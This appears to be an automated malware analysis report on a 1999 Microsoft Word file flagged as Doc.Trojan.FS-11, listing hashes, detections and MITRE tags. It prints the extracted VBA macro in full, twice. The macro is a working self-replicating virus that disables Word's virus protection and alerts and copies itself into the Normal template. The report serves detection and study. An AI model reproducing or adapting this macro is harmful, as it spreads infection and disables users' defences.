Office (OLE) malware analysis — malicious · 310f466bb1287e83

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-08-14 16:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 45356429eba429569b775f8f7ef3ec2f SHA-1: 89851f5d5c072edf6cac3c1d089f9d33891b0d34 SHA-256: 310f466bb1287e8329a51e79d63c73c500d0d00b143577ea9fddfaf53dd90fcf

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing embedded VBA macros, specifically a Document_Open macro. This macro is designed to copy its own code into the Normal template, likely to establish persistence or ensure execution on subsequent document openings. The presence of the Document_Open macro and the VBA code strongly suggests a malicious intent to execute arbitrary code.

Heuristics 3

ClamAV: Doc.Trojan.FS-11 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-11
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1022 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1022 bytes
SHA-256: `189378d559cf79f2e7ad75d75e98c113f22e139f1c48e9015a2ea46eb0daff62`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - Anoia Private Sub Document_Open() On Error Resume Next ι = ActiveDocument.Saved Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 Application.DisplayAlerts = 0 Options.ConfirmConversions = 0 Application.EnableCancelKey = 0 Application.DisplayStatusBar = 0 Set α = ActiveDocument.VBProject.VBComponents(1).CodeModule Set υ = NormalTemplate.VBProject.VBComponents(1).CodeModule Set ν = VBProject.VBComponents(1).CodeModule If α.CountOfLines < ν.CountOfLines Then α.AddFromString ν.Lines(1, ν.CountOfLines) If ActiveDocument.ReadOnly = False Then ActiveDocument.Save ElseIf υ.CountOfLines < ν.CountOfLines Then υ.AddFromString ν.Lines(1, ν.CountOfLines) End If: ActiveDocument.Saved = ι End Sub

SHA-256: 189378d559cf79f2e7ad75d75e98c113f22e139f1c48e9015a2ea46eb0daff62

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Anoia
Private Sub Document_Open()
On Error Resume Next
ι = ActiveDocument.Saved
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Options.ConfirmConversions = 0
Application.EnableCancelKey = 0
Application.DisplayStatusBar = 0
Set α = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set υ = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set ν = VBProject.VBComponents(1).CodeModule
If α.CountOfLines < ν.CountOfLines Then
α.AddFromString ν.Lines(1, ν.CountOfLines)
If ActiveDocument.ReadOnly = False Then ActiveDocument.Save
ElseIf υ.CountOfLines < ν.CountOfLines Then
υ.AddFromString ν.Lines(1, ν.CountOfLines)
End If: ActiveDocument.Saved = ι
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.